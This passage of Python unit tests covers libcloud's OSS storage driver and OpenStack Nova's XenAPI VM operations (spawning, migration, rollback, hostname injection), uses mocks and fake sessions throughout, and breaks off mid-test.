        return

    def test_ex_iterate_multipart_uploads(self):
        if not self.driver.supports_multipart_upload:
            return
        self.mock_response_klass.type = 'list_multipart'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        for upload in self.driver.ex_iterate_multipart_uploads(container,
                                                               max_uploads=2):
            self.assertTrue(upload.key is not None)
            self.assertTrue(upload.id is not None)
            self.assertTrue(upload.initiated is not None)

    def test_ex_abort_all_multipart_uploads(self):
        if not self.driver.supports_multipart_upload:
            return
        self.mock_response_klass.type = 'list_multipart'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        with mock.patch('libcloud.storage.drivers.oss.OSSStorageDriver'
                        '._abort_multipart', autospec=True) as mock_abort:
            self.driver.ex_abort_all_multipart_uploads(container)
            # The two fixture pages list three uploads in total.
            self.assertEqual(3, mock_abort.call_count)

    def test_delete_object_not_found(self):
        self.mock_response_klass.type = 'not_found'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        obj = Object(name='foo_bar_object', size=1234, hash=None, extra=None,
                     meta_data=None, container=container, driver=self.driver)
        self.assertRaises(ObjectDoesNotExistError,
                          self.driver.delete_object,
                          obj=obj)

    def test_delete_object_success(self):
        self.mock_response_klass.type = 'delete'
        container = Container(name='foo_bar_container', extra={},
                              driver=self.driver)
        obj = Object(name='foo_bar_object', size=1234, hash=None, extra=None,
                     meta_data=None, container=container, driver=self.driver)
        result = self.driver.delete_object(obj=obj)
        self.assertTrue(result)
# Allow running this test module directly; unittest.main() already raises
# SystemExit on completion, so sys.exit() only forwards the status code.
if __name__ == '__main__':
    sys.exit(unittest.main())
| Kami/libcloud | libcloud/test/storage/test_oss.py | Python | apache-2.0 | 31,715 |
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from eventlet import greenthread
import mock
from nova.compute import power_state
from nova.compute import task_states
from nova import context
from nova import exception
from nova import objects
from nova.objects import fields
from nova.pci import manager as pci_manager
from nova import test
from nova.tests.unit import fake_flavor
from nova.tests.unit import fake_instance
from nova.tests.unit.virt.xenapi import stubs
from nova.virt import fake
from nova.virt.xenapi import agent as xenapi_agent
from nova.virt.xenapi.client import session as xenapi_session
from nova.virt.xenapi import fake as xenapi_fake
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import vmops
from nova.virt.xenapi import volume_utils
from nova.virt.xenapi import volumeops
class VMOpsTestBase(stubs.XenAPITestBaseNoDB):
    """Shared scaffolding for vmops tests: a stubbed-out XenAPI session,
    a ready VMOps instance, and bookkeeping of fake VMs for teardown.
    """

    def setUp(self):
        super(VMOpsTestBase, self).setUp()
        self._setup_mock_vmops()
        self.vms = []

    def _setup_mock_vmops(self, product_brand=None, product_version=None):
        # Route all session traffic through the fake XenAPI backend so no
        # real host is ever contacted.
        stubs.stubout_session(self.stubs, xenapi_fake.SessionBase)
        session = xenapi_session.XenAPISession('test_url', 'root',
                                               'test_pass')
        self._session = session
        self.vmops = vmops.VMOps(session, fake.FakeVirtAPI())

    def create_vm(self, name, state="Running"):
        """Create a fake VM, register it for cleanup, and return its
        (record, opaque-ref) pair.
        """
        ref = xenapi_fake.create_vm(name, state)
        self.vms.append(ref)
        record = xenapi_fake.get_record("VM", ref)
        return record, ref

    def tearDown(self):
        super(VMOpsTestBase, self).tearDown()
        # Destroy every fake VM that create_vm() produced.
        for ref in self.vms:
            xenapi_fake.destroy_vm(ref)
class VMOpsTestCase(VMOpsTestBase):
    """Tests for VMOps using a bare mock session (no fake XenAPI backend).

    NOTE: the mox-based tests below record expectations in a specific
    order and then ReplayAll(); the statement order is load-bearing.
    """
    def setUp(self):
        super(VMOpsTestCase, self).setUp()
        self._setup_mock_vmops()
        self.context = context.RequestContext('user', 'project')
        self.instance = fake_instance.fake_instance_obj(self.context)
    def _setup_mock_vmops(self, product_brand=None, product_version=None):
        # Overrides the base class: uses a plain attribute-bag session
        # instead of the stubbed XenAPISession.
        self._session = self._get_mock_session(product_brand, product_version)
        self._vmops = vmops.VMOps(self._session, fake.FakeVirtAPI())
    def _get_mock_session(self, product_brand, product_version):
        # Minimal stand-in session carrying only the product attributes.
        class Mock(object):
            pass
        mock_session = Mock()
        mock_session.product_brand = product_brand
        mock_session.product_version = product_version
        return mock_session
    def _test_finish_revert_migration_after_crash(self, backup_made, new_made,
                                                  vm_shutdown=True):
        # Simulates a crash during resize-migration: depending on whether
        # the 'foo-orig' backup and/or the new 'foo' VM were created before
        # the crash, finish_revert_migration must destroy, rename,
        # re-attach and (re)start the right VM.
        instance = {'name': 'foo',
                    'task_state': task_states.RESIZE_MIGRATING}
        context = 'fake_context'
        self.mox.StubOutWithMock(vm_utils, 'lookup')
        self.mox.StubOutWithMock(self._vmops, '_destroy')
        self.mox.StubOutWithMock(vm_utils, 'set_vm_name_label')
        self.mox.StubOutWithMock(self._vmops, '_attach_mapped_block_devices')
        self.mox.StubOutWithMock(self._vmops, '_start')
        self.mox.StubOutWithMock(vm_utils, 'is_vm_shutdown')
        vm_utils.lookup(self._session, 'foo-orig').AndReturn(
            backup_made and 'foo' or None)
        vm_utils.lookup(self._session, 'foo').AndReturn(
            (not backup_made or new_made) and 'foo' or None)
        if backup_made:
            if new_made:
                self._vmops._destroy(instance, 'foo')
            vm_utils.set_vm_name_label(self._session, 'foo', 'foo')
            self._vmops._attach_mapped_block_devices(instance, [])
        vm_utils.is_vm_shutdown(self._session, 'foo').AndReturn(vm_shutdown)
        if vm_shutdown:
            self._vmops._start(instance, 'foo')
        self.mox.ReplayAll()
        self._vmops.finish_revert_migration(context, instance, [])
    def test_finish_revert_migration_after_crash(self):
        self._test_finish_revert_migration_after_crash(True, True)
    def test_finish_revert_migration_after_crash_before_new(self):
        self._test_finish_revert_migration_after_crash(True, False)
    def test_finish_revert_migration_after_crash_before_backup(self):
        self._test_finish_revert_migration_after_crash(False, False)
    def test_xsm_sr_check_relaxed_cached(self):
        # The plugin result must be cached: two calls, one plugin hit.
        self.make_plugin_call_count = 0
        def fake_make_plugin_call(plugin, method, **args):
            self.make_plugin_call_count = self.make_plugin_call_count + 1
            return "true"
        self.stubs.Set(self._vmops, "_make_plugin_call",
                       fake_make_plugin_call)
        self.assertTrue(self._vmops._is_xsm_sr_check_relaxed())
        self.assertTrue(self._vmops._is_xsm_sr_check_relaxed())
        self.assertEqual(self.make_plugin_call_count, 1)
    def test_get_vm_opaque_ref_raises_instance_not_found(self):
        instance = {"name": "dummy"}
        self.mox.StubOutWithMock(vm_utils, 'lookup')
        vm_utils.lookup(self._session, instance['name'], False).AndReturn(None)
        self.mox.ReplayAll()
        self.assertRaises(exception.InstanceNotFound,
                          self._vmops._get_vm_opaque_ref, instance)
    @mock.patch.object(vm_utils, 'destroy_vm')
    @mock.patch.object(vm_utils, 'clean_shutdown_vm')
    @mock.patch.object(vm_utils, 'hard_shutdown_vm')
    def test_clean_shutdown_no_bdm_on_destroy(self, hard_shutdown_vm,
            clean_shutdown_vm, destroy_vm):
        # Without block devices attached a hard shutdown is sufficient.
        vm_ref = 'vm_ref'
        self._vmops._destroy(self.instance, vm_ref, destroy_disks=False)
        hard_shutdown_vm.assert_called_once_with(self._vmops._session,
                                                 self.instance, vm_ref)
        self.assertEqual(0, clean_shutdown_vm.call_count)
    @mock.patch.object(vm_utils, 'destroy_vm')
    @mock.patch.object(vm_utils, 'clean_shutdown_vm')
    @mock.patch.object(vm_utils, 'hard_shutdown_vm')
    def test_clean_shutdown_with_bdm_on_destroy(self, hard_shutdown_vm,
            clean_shutdown_vm, destroy_vm):
        # With block devices attached, a clean shutdown is attempted first.
        vm_ref = 'vm_ref'
        block_device_info = {'block_device_mapping': ['fake']}
        self._vmops._destroy(self.instance, vm_ref, destroy_disks=False,
                             block_device_info=block_device_info)
        clean_shutdown_vm.assert_called_once_with(self._vmops._session,
                                                  self.instance, vm_ref)
        self.assertEqual(0, hard_shutdown_vm.call_count)
    @mock.patch.object(vm_utils, 'destroy_vm')
    @mock.patch.object(vm_utils, 'clean_shutdown_vm', return_value=False)
    @mock.patch.object(vm_utils, 'hard_shutdown_vm')
    def test_clean_shutdown_with_bdm_failed_on_destroy(self, hard_shutdown_vm,
            clean_shutdown_vm, destroy_vm):
        # If the clean shutdown fails, fall back to a hard shutdown.
        vm_ref = 'vm_ref'
        block_device_info = {'block_device_mapping': ['fake']}
        self._vmops._destroy(self.instance, vm_ref, destroy_disks=False,
                             block_device_info=block_device_info)
        clean_shutdown_vm.assert_called_once_with(self._vmops._session,
                                                  self.instance, vm_ref)
        hard_shutdown_vm.assert_called_once_with(self._vmops._session,
                                                 self.instance, vm_ref)
    @mock.patch.object(vm_utils, 'try_auto_configure_disk')
    @mock.patch.object(vm_utils, 'create_vbd',
                       side_effect=test.TestingException)
    def test_attach_disks_rescue_auto_disk_config_false(self, create_vbd,
                                                        try_auto_config):
        # auto_disk_config=false: the root disk must NOT be auto-resized.
        # create_vbd raising TestingException short-circuits _attach_disks
        # right after the point under test.
        ctxt = context.RequestContext('user', 'project')
        instance = fake_instance.fake_instance_obj(ctxt)
        image_meta = objects.ImageMeta.from_dict(
            {'properties': {'auto_disk_config': 'false'}})
        vdis = {'root': {'ref': 'fake-ref'}}
        self.assertRaises(test.TestingException, self._vmops._attach_disks,
                          instance, image_meta=image_meta, vm_ref=None,
                          name_label=None, vdis=vdis, disk_image_type='fake',
                          network_info=[], rescue=True)
        self.assertFalse(try_auto_config.called)
    @mock.patch.object(vm_utils, 'try_auto_configure_disk')
    @mock.patch.object(vm_utils, 'create_vbd',
                       side_effect=test.TestingException)
    def test_attach_disks_rescue_auto_disk_config_true(self, create_vbd,
                                                       try_auto_config):
        # auto_disk_config=true: the root disk must be auto-resized to the
        # flavor's root_gb even in rescue mode.
        ctxt = context.RequestContext('user', 'project')
        instance = fake_instance.fake_instance_obj(ctxt)
        image_meta = objects.ImageMeta.from_dict(
            {'properties': {'auto_disk_config': 'true'}})
        vdis = {'root': {'ref': 'fake-ref'}}
        self.assertRaises(test.TestingException, self._vmops._attach_disks,
                          instance, image_meta=image_meta, vm_ref=None,
                          name_label=None, vdis=vdis, disk_image_type='fake',
                          network_info=[], rescue=True)
        try_auto_config.assert_called_once_with(self._vmops._session,
            'fake-ref', instance.flavor.root_gb)
class InjectAutoDiskConfigTestCase(VMOpsTestBase):
    """Verifies that the instance's auto_disk_config flag is mirrored into
    the VM's xenstore data as a string.
    """

    def test_inject_auto_disk_config_when_present(self):
        record, ref = self.create_vm("dummy")
        instance = {"name": "dummy", "uuid": "1234", "auto_disk_config": True}
        self.vmops._inject_auto_disk_config(instance, ref)
        self.assertEqual(
            record['xenstore_data']['vm-data/auto-disk-config'], 'True')

    def test_inject_auto_disk_config_none_as_false(self):
        # A None flag must be written out as the string 'False'.
        record, ref = self.create_vm("dummy")
        instance = {"name": "dummy", "uuid": "1234", "auto_disk_config": None}
        self.vmops._inject_auto_disk_config(instance, ref)
        self.assertEqual(
            record['xenstore_data']['vm-data/auto-disk-config'], 'False')
class GetConsoleOutputTestCase(VMOpsTestBase):
    """Tests for console output retrieval and dom-id lookup.

    NOTE: the mox-based tests record expectations and then ReplayAll();
    keep the record/replay statement order intact.
    """
    def test_get_console_output_works(self):
        self.mox.StubOutWithMock(self.vmops, '_get_last_dom_id')
        instance = {"name": "dummy"}
        self.vmops._get_last_dom_id(instance, check_rescue=True).AndReturn(42)
        self.mox.ReplayAll()
        # The fake backend echoes the dom id back in the console output.
        self.assertEqual("dom_id: 42", self.vmops.get_console_output(instance))
    def test_get_console_output_throws_nova_exception(self):
        self.mox.StubOutWithMock(self.vmops, '_get_last_dom_id')
        instance = {"name": "dummy"}
        # dom_id=0 used to trigger exception in fake XenAPI
        self.vmops._get_last_dom_id(instance, check_rescue=True).AndReturn(0)
        self.mox.ReplayAll()
        self.assertRaises(exception.NovaException,
                          self.vmops.get_console_output, instance)
    def test_get_dom_id_works(self):
        instance = {"name": "dummy"}
        vm, vm_ref = self.create_vm("dummy")
        self.assertEqual(vm["domid"], self.vmops._get_dom_id(instance))
    def test_get_dom_id_works_with_rescue_vm(self):
        # With check_rescue=True the '<name>-rescue' VM is looked up.
        instance = {"name": "dummy"}
        vm, vm_ref = self.create_vm("dummy-rescue")
        self.assertEqual(vm["domid"],
                         self.vmops._get_dom_id(instance, check_rescue=True))
    def test_get_dom_id_raises_not_found(self):
        instance = {"name": "dummy"}
        self.create_vm("not-dummy")
        self.assertRaises(exception.NotFound, self.vmops._get_dom_id, instance)
    def test_get_dom_id_works_with_vmref(self):
        # An explicit vm_ref bypasses the name-based lookup entirely.
        vm, vm_ref = self.create_vm("dummy")
        self.assertEqual(vm["domid"],
                         self.vmops._get_dom_id(vm_ref=vm_ref))
class SpawnTestCase(VMOpsTestBase):
    """Tests for VMOps.spawn and VMOps.finish_migration.

    NOTE: these tests use mox record/replay. Every call below, up to
    self.mox.ReplayAll(), *records* an expected call in the exact order
    the production code must make it — the statement order is part of
    the test and must not be changed.
    """
    def _stub_out_common(self):
        """Stub out every collaborator shared by spawn/finish_migration."""
        self.mox.StubOutWithMock(self.vmops, '_ensure_instance_name_unique')
        self.mox.StubOutWithMock(self.vmops, '_ensure_enough_free_mem')
        self.mox.StubOutWithMock(self.vmops, '_update_instance_progress')
        self.mox.StubOutWithMock(vm_utils, 'determine_disk_image_type')
        self.mox.StubOutWithMock(self.vmops, '_get_vdis_for_instance')
        self.mox.StubOutWithMock(vm_utils, 'safe_destroy_vdis')
        self.mox.StubOutWithMock(self.vmops._volumeops,
                                 'safe_cleanup_from_vdis')
        self.mox.StubOutWithMock(self.vmops, '_resize_up_vdis')
        self.mox.StubOutWithMock(vm_utils,
                                 'create_kernel_and_ramdisk')
        self.mox.StubOutWithMock(vm_utils, 'destroy_kernel_ramdisk')
        self.mox.StubOutWithMock(self.vmops, '_create_vm_record')
        self.mox.StubOutWithMock(self.vmops, '_destroy')
        self.mox.StubOutWithMock(self.vmops, '_attach_disks')
        self.mox.StubOutWithMock(pci_manager, 'get_instance_pci_devs')
        self.mox.StubOutWithMock(vm_utils, 'set_other_config_pci')
        self.mox.StubOutWithMock(self.vmops, '_attach_orig_disks')
        self.mox.StubOutWithMock(self.vmops, 'inject_network_info')
        self.mox.StubOutWithMock(self.vmops, '_inject_hostname')
        self.mox.StubOutWithMock(self.vmops, '_inject_instance_metadata')
        self.mox.StubOutWithMock(self.vmops, '_inject_auto_disk_config')
        self.mox.StubOutWithMock(self.vmops, '_file_inject_vm_settings')
        self.mox.StubOutWithMock(self.vmops, '_create_vifs')
        self.mox.StubOutWithMock(self.vmops.firewall_driver,
                                 'setup_basic_filtering')
        self.mox.StubOutWithMock(self.vmops.firewall_driver,
                                 'prepare_instance_filter')
        self.mox.StubOutWithMock(self.vmops, '_start')
        self.mox.StubOutWithMock(self.vmops, '_wait_for_instance_to_start')
        self.mox.StubOutWithMock(self.vmops,
                                 '_configure_new_instance_with_agent')
        self.mox.StubOutWithMock(self.vmops, '_remove_hostname')
        self.mox.StubOutWithMock(self.vmops.firewall_driver,
                                 'apply_instance_filter')
        self.mox.StubOutWithMock(self.vmops, '_update_last_dom_id')
    def _test_spawn(self, name_label_param=None, block_device_info_param=None,
                    rescue=False, include_root_vdi=True, throw_exception=None,
                    attach_pci_dev=False):
        """Record the full expected call sequence of VMOps.spawn, replay,
        then invoke spawn.

        :param name_label_param: name label to pass to spawn; None means
            the instance name is expected to be used instead.
        :param block_device_info_param: block device info dict; when it has
            an empty root_device_name the default root device is expected
            to be filled in.
        :param rescue: exercise the extra rescue step (one more progress
            step and _attach_orig_disks).
        :param include_root_vdi: whether _get_vdis_for_instance returns a
            root VDI in addition to the volume-backed one.
        :param throw_exception: when set, the last progress update raises
            and the full rollback sequence is expected.
        :param attach_pci_dev: whether a passthrough PCI device is expected
            to be recorded in the VM's other_config.
        """
        self._stub_out_common()
        instance = {"name": "dummy", "uuid": "fake_uuid"}
        name_label = name_label_param
        if name_label is None:
            name_label = "dummy"
        image_meta = objects.ImageMeta.from_dict({"id": "image_id"})
        context = "context"
        session = self.vmops._session
        injected_files = "fake_files"
        admin_password = "password"
        network_info = "net_info"
        # spawn reports 10 progress steps; rescue adds one more.
        steps = 10
        if rescue:
            steps += 1
        block_device_info = block_device_info_param
        if block_device_info and not block_device_info['root_device_name']:
            # spawn is expected to default an empty root device name.
            block_device_info = dict(block_device_info_param)
            block_device_info['root_device_name'] = \
                self.vmops.default_root_dev
        di_type = "di_type"
        vm_utils.determine_disk_image_type(image_meta).AndReturn(di_type)
        step = 1
        self.vmops._update_instance_progress(context, instance, step, steps)
        vdis = {"other": {"ref": "fake_ref_2", "osvol": True}}
        if include_root_vdi:
            vdis["root"] = {"ref": "fake_ref"}
        self.vmops._get_vdis_for_instance(context, instance,
                name_label, "image_id", di_type,
                block_device_info).AndReturn(vdis)
        self.vmops._resize_up_vdis(instance, vdis)
        step += 1
        self.vmops._update_instance_progress(context, instance, step, steps)
        kernel_file = "kernel"
        ramdisk_file = "ramdisk"
        vm_utils.create_kernel_and_ramdisk(context, session,
                instance, name_label).AndReturn((kernel_file, ramdisk_file))
        step += 1
        self.vmops._update_instance_progress(context, instance, step, steps)
        vm_ref = "fake_vm_ref"
        self.vmops._ensure_instance_name_unique(name_label)
        self.vmops._ensure_enough_free_mem(instance)
        self.vmops._create_vm_record(context, instance, name_label,
                di_type, kernel_file,
                ramdisk_file, image_meta, rescue).AndReturn(vm_ref)
        step += 1
        self.vmops._update_instance_progress(context, instance, step, steps)
        self.vmops._attach_disks(instance, image_meta, vm_ref, name_label,
                            vdis, di_type, network_info, rescue,
                            admin_password, injected_files)
        if attach_pci_dev:
            # Minimal PCI device record; spawn should record the device in
            # the VM's other_config via set_other_config_pci.
            fake_dev = {
                'created_at': None,
                'updated_at': None,
                'deleted_at': None,
                'deleted': None,
                'id': 1,
                'compute_node_id': 1,
                'address': '00:00.0',
                'vendor_id': '1234',
                'product_id': 'abcd',
                'dev_type': fields.PciDeviceType.STANDARD,
                'status': 'available',
                'dev_id': 'devid',
                'label': 'label',
                'instance_uuid': None,
                'extra_info': '{}',
                }
            pci_manager.get_instance_pci_devs(instance).AndReturn([fake_dev])
            vm_utils.set_other_config_pci(self.vmops._session,
                                          vm_ref,
                                          "0/0000:00:00.0")
        else:
            pci_manager.get_instance_pci_devs(instance).AndReturn([])
        step += 1
        self.vmops._update_instance_progress(context, instance, step, steps)
        self.vmops._inject_instance_metadata(instance, vm_ref)
        self.vmops._inject_auto_disk_config(instance, vm_ref)
        self.vmops._inject_hostname(instance, vm_ref, rescue)
        self.vmops._file_inject_vm_settings(instance, vm_ref, vdis,
                                            network_info)
        self.vmops.inject_network_info(instance, network_info, vm_ref)
        step += 1
        self.vmops._update_instance_progress(context, instance, step, steps)
        self.vmops._create_vifs(instance, vm_ref, network_info)
        # setup_basic_filtering raising NotImplementedError must be
        # tolerated by spawn (some firewall drivers do not implement it).
        self.vmops.firewall_driver.setup_basic_filtering(instance,
                network_info).AndRaise(NotImplementedError)
        self.vmops.firewall_driver.prepare_instance_filter(instance,
                                                           network_info)
        step += 1
        self.vmops._update_instance_progress(context, instance, step, steps)
        if rescue:
            # Rescue mode attaches the original instance's disks and adds
            # the extra progress step accounted for above.
            self.vmops._attach_orig_disks(instance, vm_ref)
            step += 1
            self.vmops._update_instance_progress(context, instance, step,
                                                 steps)
        self.vmops._start(instance, vm_ref)
        self.vmops._wait_for_instance_to_start(instance, vm_ref)
        self.vmops._update_last_dom_id(vm_ref)
        step += 1
        self.vmops._update_instance_progress(context, instance, step, steps)
        self.vmops._configure_new_instance_with_agent(instance, vm_ref,
                injected_files, admin_password)
        self.vmops._remove_hostname(instance, vm_ref)
        step += 1
        self.vmops._update_instance_progress(context, instance, step, steps)
        self.vmops.firewall_driver.apply_instance_filter(instance,
                                                         network_info)
        step += 1
        last_call = self.vmops._update_instance_progress(context, instance,
                                                         step, steps)
        if throw_exception:
            # On failure in the final step, spawn must roll back: destroy
            # the VM, the kernel/ramdisk, the root VDI, and clean up the
            # volume-backed VDI.
            last_call.AndRaise(throw_exception)
            self.vmops._destroy(instance, vm_ref, network_info=network_info)
            vm_utils.destroy_kernel_ramdisk(self.vmops._session, instance,
                                            kernel_file, ramdisk_file)
            vm_utils.safe_destroy_vdis(self.vmops._session, ["fake_ref"])
            self.vmops._volumeops.safe_cleanup_from_vdis(["fake_ref_2"])
        self.mox.ReplayAll()
        self.vmops.spawn(context, instance, image_meta, injected_files,
                         admin_password, network_info,
                         block_device_info_param, name_label_param, rescue)
    def test_spawn(self):
        """Default spawn path: root VDI present, no rescue, no PCI."""
        self._test_spawn()
    def test_spawn_with_alternate_options(self):
        """Spawn without a root VDI, in rescue mode, with an explicit name
        label and a block_device_info needing a default root device."""
        self._test_spawn(include_root_vdi=False, rescue=True,
                         name_label_param="bob",
                         block_device_info_param={"root_device_name": ""})
    def test_spawn_with_pci_available_on_the_host(self):
        """Spawn with a PCI passthrough device allocated to the instance."""
        self._test_spawn(attach_pci_dev=True)
    def test_spawn_performs_rollback_and_throws_exception(self):
        """A failure during spawn triggers rollback and re-raises."""
        self.assertRaises(test.TestingException, self._test_spawn,
                          throw_exception=test.TestingException())
    def _test_finish_migration(self, power_on=True, resize_instance=True,
                               throw_exception=None, booted_from_volume=False):
        """Record the expected call sequence of VMOps.finish_migration,
        replay, then invoke finish_migration.

        :param power_on: whether the migrated instance is started.
        :param resize_instance: whether the VDIs are resized up.
        :param throw_exception: when set, the final progress update raises
            and the rollback sequence is expected.
        :param booted_from_volume: whether the root disk is a volume (the
            root is then connected rather than imported).
        """
        self._stub_out_common()
        self.mox.StubOutWithMock(volumeops.VolumeOps, "connect_volume")
        self.mox.StubOutWithMock(self.vmops._session, 'call_xenapi')
        self.mox.StubOutWithMock(vm_utils, "import_all_migrated_disks")
        self.mox.StubOutWithMock(self.vmops, "_attach_mapped_block_devices")
        context = "context"
        migration = {}
        name_label = "dummy"
        instance = {"name": name_label, "uuid": "fake_uuid",
                    "root_device_name": "/dev/xvda"}
        disk_info = "disk_info"
        network_info = "net_info"
        image_meta = objects.ImageMeta.from_dict({"id": "image_id"})
        block_device_info = {}
        import_root = True
        if booted_from_volume:
            # Volume-backed root: the volume is connected and looked up by
            # UUID instead of being imported from the migration.
            block_device_info = {'block_device_mapping': [
                {'mount_device': '/dev/xvda',
                 'connection_info': {'data': 'fake-data'}}]}
            import_root = False
            volumeops.VolumeOps.connect_volume(
                    {'data': 'fake-data'}).AndReturn(('sr', 'vol-vdi-uuid'))
            self.vmops._session.call_xenapi('VDI.get_by_uuid',
                    'vol-vdi-uuid').AndReturn('vol-vdi-ref')
        session = self.vmops._session
        self.vmops._ensure_instance_name_unique(name_label)
        self.vmops._ensure_enough_free_mem(instance)
        di_type = "di_type"
        vm_utils.determine_disk_image_type(image_meta).AndReturn(di_type)
        root_vdi = {"ref": "fake_ref"}
        ephemeral_vdi = {"ref": "fake_ref_e"}
        vdis = {"root": root_vdi, "ephemerals": {4: ephemeral_vdi}}
        vm_utils.import_all_migrated_disks(self.vmops._session, instance,
                import_root=import_root).AndReturn(vdis)
        kernel_file = "kernel"
        ramdisk_file = "ramdisk"
        vm_utils.create_kernel_and_ramdisk(context, session,
                instance, name_label).AndReturn((kernel_file, ramdisk_file))
        vm_ref = "fake_vm_ref"
        rescue = False
        self.vmops._create_vm_record(context, instance, name_label,
                di_type, kernel_file,
                ramdisk_file, image_meta, rescue).AndReturn(vm_ref)
        if resize_instance:
            self.vmops._resize_up_vdis(instance, vdis)
        self.vmops._attach_disks(instance, image_meta, vm_ref, name_label,
                vdis, di_type, network_info, False, None, None)
        self.vmops._attach_mapped_block_devices(instance, block_device_info)
        pci_manager.get_instance_pci_devs(instance).AndReturn([])
        self.vmops._inject_instance_metadata(instance, vm_ref)
        self.vmops._inject_auto_disk_config(instance, vm_ref)
        self.vmops._file_inject_vm_settings(instance, vm_ref, vdis,
                                            network_info)
        self.vmops.inject_network_info(instance, network_info, vm_ref)
        self.vmops._create_vifs(instance, vm_ref, network_info)
        self.vmops.firewall_driver.setup_basic_filtering(instance,
                network_info).AndRaise(NotImplementedError)
        self.vmops.firewall_driver.prepare_instance_filter(instance,
                                                           network_info)
        if power_on:
            self.vmops._start(instance, vm_ref)
            self.vmops._wait_for_instance_to_start(instance, vm_ref)
            self.vmops._update_last_dom_id(vm_ref)
        self.vmops.firewall_driver.apply_instance_filter(instance,
                                                         network_info)
        # finish_migration only reports the final 5/5 progress step; the
        # earlier steps were reported by migrate_disk_and_power_off.
        last_call = self.vmops._update_instance_progress(context, instance,
                                                         step=5, total_steps=5)
        if throw_exception:
            # Rollback: destroy the VM, kernel/ramdisk, and imported VDIs.
            last_call.AndRaise(throw_exception)
            self.vmops._destroy(instance, vm_ref, network_info=network_info)
            vm_utils.destroy_kernel_ramdisk(self.vmops._session, instance,
                                            kernel_file, ramdisk_file)
            vm_utils.safe_destroy_vdis(self.vmops._session,
                                       ["fake_ref_e", "fake_ref"])
        self.mox.ReplayAll()
        self.vmops.finish_migration(context, migration, instance, disk_info,
                                    network_info, image_meta, resize_instance,
                                    block_device_info, power_on)
    def test_finish_migration(self):
        """Default finish_migration path: power on and resize."""
        self._test_finish_migration()
    def test_finish_migration_no_power_on(self):
        """finish_migration without starting or resizing the instance."""
        self._test_finish_migration(power_on=False, resize_instance=False)
    def test_finish_migration_booted_from_volume(self):
        """finish_migration for a volume-backed root disk."""
        self._test_finish_migration(booted_from_volume=True)
    def test_finish_migrate_performs_rollback_on_error(self):
        """A failure during finish_migration triggers rollback and raises."""
        self.assertRaises(test.TestingException, self._test_finish_migration,
                          power_on=False, resize_instance=False,
                          throw_exception=test.TestingException())
    def test_remove_hostname(self):
        """_remove_hostname deletes vm-data/hostname from the xenstore."""
        vm, vm_ref = self.create_vm("dummy")
        instance = {"name": "dummy", "uuid": "1234", "auto_disk_config": None}
        self.mox.StubOutWithMock(self._session, 'call_xenapi')
        self._session.call_xenapi("VM.remove_from_xenstore_data", vm_ref,
                                  "vm-data/hostname")
        self.mox.ReplayAll()
        self.vmops._remove_hostname(instance, vm_ref)
        self.mox.VerifyAll()
    def test_reset_network(self):
        """reset_network re-injects the hostname and calls the guest
        agent's resetnetwork when the agent is enabled."""
        class mock_agent(object):
            def __init__(self):
                self.called = False
            def resetnetwork(self):
                self.called = True
        vm, vm_ref = self.create_vm("dummy")
        instance = {"name": "dummy", "uuid": "1234", "auto_disk_config": None}
        agent = mock_agent()
        self.mox.StubOutWithMock(self.vmops, 'agent_enabled')
        self.mox.StubOutWithMock(self.vmops, '_get_agent')
        self.mox.StubOutWithMock(self.vmops, '_inject_hostname')
        self.mox.StubOutWithMock(self.vmops, '_remove_hostname')
        self.vmops.agent_enabled(instance).AndReturn(True)
        self.vmops._get_agent(instance, vm_ref).AndReturn(agent)
        self.vmops._inject_hostname(instance, vm_ref, False)
        self.vmops._remove_hostname(instance, vm_ref)
        self.mox.ReplayAll()
        self.vmops.reset_network(instance)
        self.assertTrue(agent.called)
        self.mox.VerifyAll()
    def test_inject_hostname(self):
        """The plain hostname is written to vm-data/hostname."""
        instance = {"hostname": "dummy", "os_type": "fake", "uuid": "uuid"}
        vm_ref = "vm_ref"
        self.mox.StubOutWithMock(self.vmops, '_add_to_param_xenstore')
        self.vmops._add_to_param_xenstore(vm_ref, 'vm-data/hostname', 'dummy')
        self.mox.ReplayAll()
        self.vmops._inject_hostname(instance, vm_ref, rescue=False)
    def test_inject_hostname_with_rescue_prefix(self):
        """In rescue mode the hostname is prefixed with RESCUE-."""
        instance = {"hostname": "dummy", "os_type": "fake", "uuid": "uuid"}
        vm_ref = "vm_ref"
        self.mox.StubOutWithMock(self.vmops, '_add_to_param_xenstore')
        self.vmops._add_to_param_xenstore(vm_ref, 'vm-data/hostname',
                                          'RESCUE-dummy')
        self.mox.ReplayAll()
        self.vmops._inject_hostname(instance, vm_ref, rescue=True)
    def test_inject_hostname_with_windows_name_truncation(self):
        """Windows hostnames are truncated (here to 15 characters including
        the rescue prefix)."""
        instance = {"hostname": "dummydummydummydummydummy",
                    "os_type": "windows", "uuid": "uuid"}
        vm_ref = "vm_ref"
        self.mox.StubOutWithMock(self.vmops, '_add_to_param_xenstore')
        self.vmops._add_to_param_xenstore(vm_ref, 'vm-data/hostname',
                                          'RESCUE-dummydum')
        self.mox.ReplayAll()
        self.vmops._inject_hostname(instance, vm_ref, rescue=True)
    def test_wait_for_instance_to_start(self):
        """_wait_for_instance_to_start polls power state, sleeping between
        polls, until the instance reports RUNNING."""
        instance = {"uuid": "uuid"}
        vm_ref = "vm_ref"
        self.mox.StubOutWithMock(vm_utils, 'get_power_state')
        self.mox.StubOutWithMock(greenthread, 'sleep')
        vm_utils.get_power_state(self._session, vm_ref).AndReturn(
                power_state.SHUTDOWN)
        greenthread.sleep(0.5)
        vm_utils.get_power_state(self._session, vm_ref).AndReturn(
                power_state.RUNNING)
        self.mox.ReplayAll()
        self.vmops._wait_for_instance_to_start(instance, vm_ref)
    def test_attach_orig_disks(self):
        """_attach_orig_disks attaches the original VM's root disk to the
        rescue VM on the rescue device, non-bootable."""
        instance = {"name": "dummy"}
        vm_ref = "vm_ref"
        vbd_refs = {vmops.DEVICE_ROOT: "vdi_ref"}
        self.mox.StubOutWithMock(vm_utils, 'lookup')
        self.mox.StubOutWithMock(self.vmops, '_find_vdi_refs')
